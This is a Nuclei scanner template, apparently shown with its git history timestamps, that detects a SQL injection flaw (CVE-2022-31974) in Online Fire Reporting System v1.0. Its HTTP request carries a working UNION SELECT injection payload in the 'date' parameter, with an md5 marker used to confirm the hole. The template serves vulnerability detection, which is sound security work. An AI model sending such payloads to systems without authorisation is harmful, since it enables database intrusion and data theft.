nuclei-templates/http/cves/2022/CVE-2022-31974.yaml

54 lines
1.9 KiB
YAML
Raw Normal View History

2023-06-05 07:03:16 +00:00
id: CVE-2022-31974
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2023-06-05 07:03:16 +00:00
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-1.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31974
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31974
cwe-id: CWE-89
epss-score: 0.00834
epss-percentile: 0.80157
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
2023-06-05 07:03:16 +00:00
metadata:
verified: "true"
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
2023-06-05 07:03:16 +00:00
variables:
num: '999999999'
http:
- method: GET
path:
- "{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100c65bbfe7f91288eda1b81ff09b9a4d55117fd6bc6646f80b4e811818bbff0d8b022014a8de5c151c28b7ba4b8363312f61859b284fcec6fc3d46769a7f8045e0fb9a:922c64590222798bb761d5b6d8e72950